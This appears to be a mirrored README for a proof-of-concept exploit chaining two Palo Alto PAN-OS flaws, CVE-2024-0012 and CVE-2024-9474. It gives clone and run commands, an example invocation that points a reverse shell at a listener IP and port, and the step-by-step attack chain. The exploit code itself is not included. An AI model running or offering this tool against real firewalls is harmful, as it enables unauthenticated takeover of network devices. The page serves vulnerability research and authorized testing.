## https://sploitus.com/exploit?id=12AD7FBE-9A82-5661-9E65-B8E03F68B3C3
# CVE-2024-0012 & CVE-2024-9474 (Palo Alto PAN-OS) Exploit

![Palo Alto PAN-OS](https://img.shields.io/badge/Product-Palo%20Alto%20PAN--OS-blue)
![Exploit Type](https://img.shields.io/badge/Type-RCE%20%7C%20Authentication%20Bypass-yellow)

## Description

This Proof-of-Concept (PoC) script targets two vulnerabilities in Palo Alto PAN-OS, **CVE-2024-0012** and **CVE-2024-9474**, and automates the exploitation process, including authentication bypass, payload creation, chunked delivery, and seamless command execution.


> **This script is for educational and authorized penetration testing purposes only. Unauthorized use is illegal.**

---

## Vulnerabilities Addressed
### CVE-2024-0012
- **Type**: Authentication Bypass
- **Impact**: Enables unauthorized access to administrative interfaces.
- **Severity**: Critical

### CVE-2024-9474
- **Type**: Command Execution & Privilege Escalation
- **Impact**: Allows remote attackers to execute arbitrary commands.
- **Severity**: Medium

---

## Usage
### Clone the Repository
```bash
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC
```

### Run the Script
```bash
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
```

#### Arguments:
- `<TARGET_URL>`: The target URL, including `http` or `https`.
- `<LISTENER_IP>`: Your IP address for the reverse shell listener.
- `<LISTENER_PORT>`: The port for the reverse shell listener.

---

### Example
```bash
python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444
```
---

### Exploit Demo
https://github.com/user-attachments/assets/12ca7632-e5d2-488f-b644-6e278651a2f5

---

## How It Works
Get the full breakdown and technical insights into this PoC from this [Medium Write-up](https://medium.com/@talatumsolutions/breaking-the-firewall-exploiting-pan-os-vulnerabilities-for-unauthenticated-remote-code-execution-23bf79d3f245)!
1. **Checks Vulnerability**: Ensures the target is vulnerable to CVE-2024-0012 and CVE-2024-9474.
2. **Extracts PHPSESSID**: Retrieves a session ID for further exploitation.
3. **Generates Payload**: Creates a double-encoded reverse shell payload.
4. **Uploads Chunks**: Sends payload chunks to the target server.
5. **Combines Payload**: Reconstructs the payload on the target system.
6. **Executes Command**: Decodes and executes the reverse shell.

---

## Legal Disclaimer
This PoC is intended for **educational purposes** and **authorized security testing** only. Unauthorized use of this tool is strictly prohibited. The authors are not responsible for any misuse or damage caused by this tool.

---

## Author
[ghostxploiter](https://github.com/itxalee)